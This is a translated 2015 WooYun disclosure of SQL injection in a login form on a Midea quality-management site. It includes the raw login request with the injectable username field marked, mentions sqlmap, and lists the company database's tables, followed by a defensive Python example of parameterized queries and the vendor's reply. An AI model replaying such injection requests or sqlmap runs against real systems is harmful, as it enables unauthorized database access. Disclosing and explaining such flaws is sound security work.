
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0145121

Title: SQL injection vulnerability on a Midea sub-site

Vendor: midea.com

Author: 路人甲

Submitted: 2015-10-07 08:40

Fixed: 2015-11-21 19:34

Published: 2015-11-21 19:34

Type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)

Favorites: 4


Vulnerability details

Disclosure status:

2015-10-07: Details sent to the vendor; awaiting vendor action
2015-10-07: Vendor confirmed; details visible to the vendor only
2015-10-17: Details opened to core white hats and domain experts
2015-10-27: Details opened to regular white hats
2015-11-06: Details opened to intern white hats
2015-11-21: Details opened to the public

Brief description:

SQL injection vulnerability

Detailed description:

At first glance the login form at http://qms.midea.com.cn/ showed nothing wrong, and I did not want to brute-force it.

[screenshot: QQ图片20151007003438.png]


But I found that http://qms.midea.com.cn/CE/default.aspx is the same system as above.

[screenshot: QQ图片20151007003613.png]


Clearly the backend database is Oracle.
I captured the login request:

POST /CE/default.aspx HTTP/1.1
Host: qms.midea.com.cn
Proxy-Connection: keep-alive
Content-Length: 250
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://qms.midea.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://qms.midea.com.cn/CE/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=uc5ues45xgqzgq2zjqk045vm
__VIEWSTATE=%2FwEPDwULLTEyODkwNjgzOTMPZBYCAgMPZBYCAgsPDxYCHgRUZXh0BSfor6XnlKjmiLfkuI3lrZjlnKjmiJbogIXlr4bnoIHplJnor6%2FvvIFkZGTudlv6iFY8jWXoEVrL4hLt%2FZp3Jg%3D%3D&DDL_ZZ=2149&TextBoxUserName=admin*&TextBoxPassword=admin&ButtonLogin=%E7%99%BB+%E5%BD%95


Ran sqlmap directly against it to dump data:

[screenshot: QQ图片20151007003819.jpg]


All database names:

[screenshot: QQ图片20151007003922.jpg]


Current database name:

[screenshot: QQ图片20151007004026.jpg]


All tables in the current database:

Database: QMSCEADMIN
[248 tables]
+--------------------------------+
| AA |
| BASE_ALLOW_VENDOR_LIST |
| BASE_ERP_TO_QMS_ITEMS |
| BASE_ERP_TO_QMS_VENDORS_INFO |
| CE_IQC_QUOTA_UPDATE |
| CE_OQC_FUNC_REP |
| CE_OQC_SIGNAL |
| CE_OQC_WENSHE |
| CP_UPDATE_APLLYLIST_LOG |
| CTQ_ITEM_MANAGE |
| CTQ_SPECTFICATIONS |
| CTXSYS_DATABASE_USERS |
| CTXSYS_MODULE_DATABASE |
| CTXSYS_SYSTEM_STRUCTURE |
| CTXSYS_SYSTEM_USERNAMEMATCH |
| CTXSYS_SYSTEM_USERS |
| CTX_WORK_FLOW_EMAIL |
| EARLY_PRODUCT_REPORT_QUERY |
| ERP_W_QMS_SCRAP |
| IQC00_ASSORTMENT |
| IQC00_ASSORTMENT_BAK |
| IQC00_BASE_APLLYLIST |
| IQC00_BASE_APLLYLIST_1 |
| IQC00_BASE_MATERIAL_SHOTNAME |
| IQC00_DEFECT_ASSORTMENT |
| IQC01_INSPECT_LPNNUMBER |
| IQC01_INSPECT_MIDEA |
| IQC01_INSPECT_MIDEA01 |
| IQC01_INSPECT_MIDEA01_LOG |
| IQC01_INSPECT_MIDEA_ITEMA |
| IQC01_INSPECT_VENDOR |
| IQC01_INSPECT_VENDOR_ITEMA |
| IQC02_ACRE_MIDEA |
| IQC02_ORIG_INSPECT |
| IQC02_SAMPLESTANDARD |
| IQC02_SWATCHLETTER |
| IQC04_SPEC02_ITEMS |
| IQC_8D_AUDIT_ITEM |
| IQC_8D_CHECK_ITEM |
| IQC_8D_INSPECTION_ITEM |
| IQC_8D_INSPECTION_REPORT |
| IQC_BASE_APLLYLIST_DEL_LOG |
| IQC_CUSTOMER_COMPLAINTS |
| IQC_EAELY_INSPECT_ORIG_M |
| IQC_EARLY_INSPECT |
| IQC_EARLY_INSPECT_LOG |
| IQC_EARLY_RECORD |
| IQC_EXCEPTION_INFORMATION |
| IQC_GYS_WORKFLOW |
| IQC_INSPECTION |
| IQC_INSPECT_ITEM |
| IQC_INSPECT_ITEM_D |
| IQC_INSPECT_MOP_LIST |
| IQC_INSPECT_ORIG_M |
| IQC_INSPECT_ORIG_MOP |
| IQC_INSPECT_ORIG_M_LOG |
| IQC_KEY3_REVIEW_REC |
| IQC_LOSS_RECORD |
| IQC_MAIN_WORKFLOW |
| IQC_MONTH_PLAN |
| IQC_ORT_MONTH_PLAN |
| IQC_ORT_TYPE_RECORD |
| IQC_ORT_TYPE_TEST |
| IQC_PART_BASIS_MESSAGE |
| IQC_PART_BASIS_MESSAGE1 |
| IQC_PART_BASIS_MESSAGE_LOG |
| IQC_PART_MESSAGE_DEL_LOG |
| IQC_PRD10_MATERAIL_REJECT |
| IQC_ROHS_WORKFLOW |
| IQC_SAMPLESHIFT |
| IQC_SCREEN_INSPECTION |
| IQC_SCREEN_LIST |
| IQC_SPECIAL_PROCURE |
| IQC_TEST_MAINTAIN |
| IQC_TEST_REPORT |
| IQC_TEST_REPORT_DROP |
| IQC_TEST_WORKFLOW |
| IQC_TO_SCM_APLLYLIST_LOG |
| IQC_TR_SPECIFICATIONS |
| IQC_TYPE_RECORD |
| IQC_TYPE_TEST |
| IQC_UPDATA_SCM_LOG |
| IQC_VENDOR_MASTER_D |
| IQC_VENDOR_MASTER_M |
| IQC_XINGSHIWEITUO |
| IQC_XS_LIST |
| ITEM_UPDATE_LOG |
| OQC_TRIAL_PRO_INF_TABLES |
| PDM_TO_QMS_CPCECNDRAW_LOG |
| PDM_TO_QMS_CPCECNDRAW_M |
| PQC_BOM_CONTRAST |
| PQC_MATERAIL_REJECT |
| PUB_IQC00_INSPECT_MIDEA |
| QIS7_CAPABILITIES |
| QIS7_CERTIFICATES |
| QIS7_CLMINPUTCHARTS |
| QIS7_DATAEDITORS |
| QIS7_DATAIMIGRATES |
| QIS7_DOEANALYSIS |
| QIS7_EFFECTIVEINDEXES |
| QIS7_INPUTFORMS |
| QIS7_MACHINDATACAPTURE |
| QIS7_MANHATTANS |
| QIS7_MSANALYSIS |
| QIS7_MULTICHARTS |
| QIS7_PARETOCHARTS |
| QIS7_PERFERMANCES |
| QIS7_QUERIES |
| QIS7_REALTIMEINPUT |
| QIS7_REMOTEDATATRANSFER |
| QIS7_SCATTERS |
| QIS7_SCREENMONITOR |
| QIS7_SHEWHARTS |
| QIS7_SPECIALCERTIFICATES |
| QIS7_STATISMONITOR |
| QIS7_SYSMONITORS |
| QIS7_TRANSACTIONMANAGER |
| QIS7_VARIATIONS |
| QIS7_WORKFLOWMANAGER |
| QIS_SYSTEM_AUDITORS |
| QIS_SYSTEM_COMDATAEXPORT |
| QIS_SYSTEM_COMDATAFILTERS |
| QIS_SYSTEM_COMMDATATRANSFER |
| QIS_SYSTEM_COMPARAMETERS |
| QIS_SYSTEM_EMAILSERVERINFOR |
| QIS_SYSTEM_EXCEPTION |
| QIS_SYSTEM_EXCEPTVALUE |
| QIS_SYSTEM_EXTRACTDATA |
| QIS_SYSTEM_IBMMQDEFINITION |
| QIS_SYSTEM_IBMMQINPUTFORMS |
| QIS_SYSTEM_IBMMQMANAGER |
| QIS_SYSTEM_IBMMQMSGRESOLUTION |
| QIS_SYSTEM_IBMMQMSGRESTABLE |
| QIS_SYSTEM_RECSDATAFILTERS |
| QIS_SYSTEM_RECSTRANSFROMDB |
| QIS_SYSTEM_REPORTFILETYPE |
| QIS_SYSTEM_SAPRFCFUNCTIONS |
| QIS_SYSTEM_SAPRFCINTERFACE |
| QIS_SYSTEM_SAPRFCOPERCONFIRM |
| QIS_SYSTEM_SAPRFCPARAMVALUES |
| QIS_SYSTEM_SAPRFCQISOPERATION |
| QIS_SYSTEM_SAPROUTELOG |
| QIS_SYSTEM_SAPSVRINTERFACE |
| QIS_SYSTEM_SAPSVROPERCONFIRM |
| QIS_SYSTEM_SAPSVRPARAMVALUES |
| QIS_SYSTEM_SAPSVRQISOPERATION |
| QIS_SYSTEM_SAPUSERINFOR |
| QIS_SYSTEM_SENDMSGSTRUCTURE |
| QIS_SYSTEM_SENDMSGTEMPLATE |
| QIS_SYSTEM_WORKFLOWSERVERLOG |
| QIS_SYS_ARCHBATCHINTABLE |
| QIS_SYS_ARCHIVEKEYWORDS |
| QIS_SYS_AUTHAGENTNAME |
| QIS_SYS_BACKRECLOGTABLE |
| QIS_SYS_BACKUPDELETERECS |
| QIS_SYS_BARCODEPRINTPRM |
| QIS_SYS_BARCODEPRNPARAMETER |
| QIS_SYS_BARCODESTDPARAMETER |
| QIS_SYS_BAS00_BATCH_NO |
| QIS_SYS_BATCHBINCALLS |
| QIS_SYS_CHARTINPUTPICTURE |
| QIS_SYS_CHARTPOINTTRACE |
| QIS_SYS_CHOICELISTS |
| QIS_SYS_CLMINPUTCHARTS |
| QIS_SYS_COMPONENTTABLE |
| QIS_SYS_COMTRANSACTIONRECOUT |
| QIS_SYS_COMTRANSINPUTFORM |
| QIS_SYS_COMTRANSRELATION |
| QIS_SYS_COMTRANSSRVLOGTABLE |
| QIS_SYS_DBRECSSRVLOGTABLE |
| QIS_SYS_DBWEBSRVLOGTABLE |
| QIS_SYS_DOCUMENTATIONSPECS |
| QIS_SYS_DYNAMICDLLFORMS |
| QIS_SYS_DYNAMICDLLPARAMS |
| QIS_SYS_EMAILADDRESSMANAGER |
| QIS_SYS_EXPERTCOMMENTS |
| QIS_SYS_FLOWTRANSACTIONS |
| QIS_SYS_FORMMODIFICATION |
| QIS_SYS_FORMTABLEVIEW |
| QIS_SYS_GROUPFIELDNAME |
| QIS_SYS_IBMMQSRVLOGTABLE |
| QIS_SYS_IMIGRATEPARAMS |
| QIS_SYS_INDEXKEYS |
| QIS_SYS_LANGUAGETABLE |
| QIS_SYS_LIMITEDUSERTABLE |
| QIS_SYS_LOTUSNOTESINFOR |
| QIS_SYS_MANIPULATEOUTOFRECS |
| QIS_SYS_ONLINEIDLETIME |
| QIS_SYS_ONLINEUSELIST |
| QIS_SYS_POPUPINPUTFORMLIST |
| QIS_SYS_PRODLINEPARAMETER |
| QIS_SYS_PRODLINESTOPCONTROL |
| QIS_SYS_PRODLINESTOPDIRECT |
| QIS_SYS_REALTIMEMONITOR |
| QIS_SYS_RECFILTERCONSTS |
| QIS_SYS_RELATEDFORMVALUE |
| QIS_SYS_RELATEDSPECKEYITEMS |
| QIS_SYS_RS232DATATRANSLOG |
| QIS_SYS_RS232PARAMETERS |
| QIS_SYS_SAPAUTODECISION |
| QIS_SYS_SAPAUTODECISIONLOGO |
| QIS_SYS_SAPCALLWEBSERVICE |
| QIS_SYS_SCREENDISPLAYTEXT |
| QIS_SYS_SHAREDDIRECTORY |
| QIS_SYS_SPECIFICATIONS |
| QIS_SYS_STATISVIEWTABLE |
| QIS_SYS_STATSTRANSACTION |
| QIS_SYS_SUBTEMPLETES |
| QIS_SYS_SYSTEMITEMTABLE |
| QIS_SYS_TABLEDEFINITION |
| QIS_SYS_TABLERELATIONS |
| QIS_SYS_TABLESPECKEYFIELDS |
| QIS_SYS_TECHNICALGUIDES |
| QIS_SYS_TRANSACTIONAGENT |
| QIS_SYS_TRANSACTIONFLOWBACKUP |
| QIS_SYS_TRANSACTIONFLOWMANAGER |
| QIS_SYS_TRANSACTIONFLOWTRASH |
| QIS_SYS_TRANSCYCLETIME |
| QIS_SYS_URLCONFIGURATION |
| QIS_SYS_WEBDATABINDINTERFACE |
| QIS_SYS_WEBDATACERTINTERFACE |
| QIS_SYS_WEBDATAINTABLES |
| QIS_SYS_WEBDATAINTERFACE |
| QIS_SYS_WEBDATAOUTTABLES |
| QIS_SYS_WEBPAGENAMES |
| QIS_SYS_WEBQMSCALLBATCH |
| QIS_SYS_WEBQMSCALLTABLE |
| QIS_SYS_WEBSERVEMETHOD |
| QIS_SYS_WEBSRVCALLDATASET |
| QIS_SYS_WEBSRVCALLMETHOD |
| QIS_SYS_WEBSRVCALLPROPERTY |
| QIS_SYS_WEBSRVCALLTABLE |
| QIS_SYS_WEBSVAPPBATCH |
| QIS_SYS_WEBSVQMSDATASETDEF |
| QIS_SYS_WEBSVQMSDEFINITION |
| QIS_SYS_WORKFLOWTRANSACTIONS |
| QIS_SYS_WORKTRANSFERATION |
| QMS_ORG |
| SCM_PO_CHECK_LOG |
| SRM_TO_QMS_WRITE_BACK |
| SYS_MAIL_LOG |
| SYS_MAIL_TASK |
| T |
| TEST_TABLE |
| TEST_WORD_LIN |
| VENDOR_MATE |
| YLG_ZL_BLL |
| YLG_ZL_KB |
+--------------------------------+


Proving the vulnerability is enough; I did not go any further.
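The defect behind this report is the way the login page handles the TextBoxUserName and TextBoxPassword fields: the captured request shows the injection point in TextBoxUserName, which means the form value reaches the Oracle parser as part of the SQL text. The following is an added example, not code from the report or from Midea's application. It uses an in-memory SQLite table as a stand-in for the Oracle backend (the table and column names are assumptions), and contrasts the string-concatenation pattern with the bind-variable fix. A legitimate username containing an apostrophe is enough to show the difference: the concatenated query fails with a database error, while the parameterized one simply denies the login.

```python
import sqlite3

# Constructed stand-in for the QMS login backend: an in-memory SQLite table with
# a single account. The report says the real backend is Oracle; this table and
# its column names are assumptions made for the example, not Midea's schema.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_user (username TEXT PRIMARY KEY, password TEXT)")
    # A real application would store and compare a password hash, not the password.
    conn.execute("INSERT INTO app_user VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable pattern: the form fields are pasted into the SQL text, so a
    quote in the username changes the statement's grammar."""
    sql = ("SELECT COUNT(*) FROM app_user WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] == 1


def login_param(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened pattern: bind variables. The driver sends the values separately
    from the statement, so they can never be parsed as SQL."""
    sql = "SELECT COUNT(*) FROM app_user WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] == 1


def probe(login, conn: sqlite3.Connection, username: str, password: str) -> str:
    """Classify one login attempt as 'granted', 'denied', or 'error'.
    'error' means the database rejected the statement, which is the symptom
    that tells a tester, or a monitoring rule on ORA- errors, that user input
    reached the SQL parser."""
    try:
        return "granted" if login(conn, username, password) else "denied"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    # A legitimate name containing an apostrophe is enough to show the defect.
    for name, fn in (("concat", login_concat), ("param", login_param)):
        print(name, "O'Brien ->", probe(fn, db, "O'Brien", "wrong"))
        print(name, "admin   ->", probe(fn, db, "admin", "correct-horse"))
```

In the ASP.NET application the same fix means building the OracleCommand with bind placeholders (`:username`, `:password`) and adding the form values through the command's Parameters collection instead of concatenating them into the statement. On the defender's side, database syntax errors raised by the login page are worth alerting on, since a well-formed login never produces them.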

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vendor response

Vendor reply:

Severity: Medium

Rank: 8

Confirmed: 2015-10-07 19:32

Vendor comment:

Thanks to WooYun's most formidable white hat @路人甲 for the heads-up; we have summoned the application administrator to fix it.
By the way: 路人甲, what good does such a high Rank do you...

Latest status:

None


Comments:

  1. 2015-10-07 08:49 | 羊大仙 ( Passerby | Rank:3 Vulns:2 | The government has a secret system, a machine that watches you, every...)

    Damn! This one is mine.

  2. 2015-10-07 09:56 | Midea Group (WooYun vendor)

    Playing dead; will confirm once I'm at work.

  3. 2015-10-07 12:17 | DNS ( Regular white hat | Rank:711 Vulns:73 | root@qisec.com)

    @Midea Group White hats love digging into mischievous kids; wait for a pair of vulnerabilities.

  4. 2015-10-07 19:32 | Midea Group (WooYun vendor)

    @DNS Do you really prefer the vendors that quietly fix and then ignore the report? Like a certain one whose name starts with "China".

  5. 2015-10-07 20:00 | DNS ( Regular white hat | Rank:711 Vulns:73 | root@qisec.com)

    @Midea Group I like you.

  6. 2015-10-07 20:43 | Midea Group (WooYun vendor)

    @DNS WooYun may be a bromance platform, but don't make your confession so obvious...